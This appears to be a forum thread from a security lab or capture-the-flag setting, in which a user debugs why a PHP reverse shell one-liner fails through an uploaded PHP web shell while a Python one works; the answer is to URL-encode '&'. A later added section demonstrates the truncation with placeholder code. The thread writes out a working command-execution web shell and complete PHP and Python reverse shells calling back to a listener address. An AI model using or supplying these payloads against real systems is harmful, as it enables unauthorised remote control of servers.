PHP reverse shell one-liner not working from browser

Hi,

I uploaded a simple shell in a webserver:

<?php echo exec($_GET['cmd']);?>

The system has Python and, obviously, PHP installed. I don't understand why my PHP reverse shell one-liner is not working when executing the command via the simple PHP shell:

php -r '$sock=fsockopen("192.168.99.2",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

If I use an equivalent command, but with Python, it works:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.99.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And now, if I execute the first command from the shell spawned with Python, then the PHP one-liner works... I tried to find out why that is, but can't find the answer; maybe I'm not searching for the correct terms.

It looks like the problem is that when the command is executed from the browser, something is not working. If I just try to open the socket, I receive the connection in the listener, or if I exec touch /tmp/touched instead of /bin/sh... the file is created, but if I use the complete one-liner then it doesn't work.

Does anyone know why that is happening? Why is Python working but PHP not?

Thanks!

You need to URL-encode '&' as %26 because it's acting as a bad character in the browser.

@irfan said:
You need to URL-encode '&' as %26 because it's acting as a bad character in the browser.

Ouch! I see... Thanks!!
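To make the answer concrete, here is an added example (not from the thread) showing what `$_GET['cmd']` actually receives when the value contains a bare `&`: the query string is split on `&` before the parameter is read, so everything from the first redirection onwards is lost. The hostname and the command are constructed placeholders; the command only reuses the `<&3 >&3 2>&3` redirection pattern that caused the truncation.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Constructed placeholder command that contains the same shell redirection
# characters as the one-liner in the thread; it is not the reverse shell.
COMMAND = "sh -c 'hostname <&3 >&3 2>&3'"


def build_url(cmd: str, encode: bool) -> str:
    """Build the request URL, optionally percent-encoding the cmd value.

    target.example is a placeholder host, not a real target.
    """
    value = quote(cmd, safe="") if encode else cmd
    return f"http://target.example/shell.php?cmd={value}"


def received_cmd(url: str) -> str:
    """Model what PHP's $_GET['cmd'] sees: the query is split on '&' first,
    and fragments without an '=' ('3 >', '3 2>', ...) are discarded."""
    query = urlsplit(url).query
    return parse_qs(query).get("cmd", [""])[0]


def demo() -> tuple[str, str]:
    """Return the server-side value of cmd for the raw and the encoded URL."""
    raw = received_cmd(build_url(COMMAND, encode=False))
    enc = received_cmd(build_url(COMMAND, encode=True))
    return raw, enc


if __name__ == "__main__":
    raw, enc = demo()
    print("raw     :", repr(raw))  # truncated at the first '&'
    print("encoded :", repr(enc))  # full command survives
```

The truncated value ends in an unterminated string literal, so `php -r` fails with a parse error before `fsockopen()` ever runs, which is why only the commands without `&` (the bare socket test, `touch`) appeared to work.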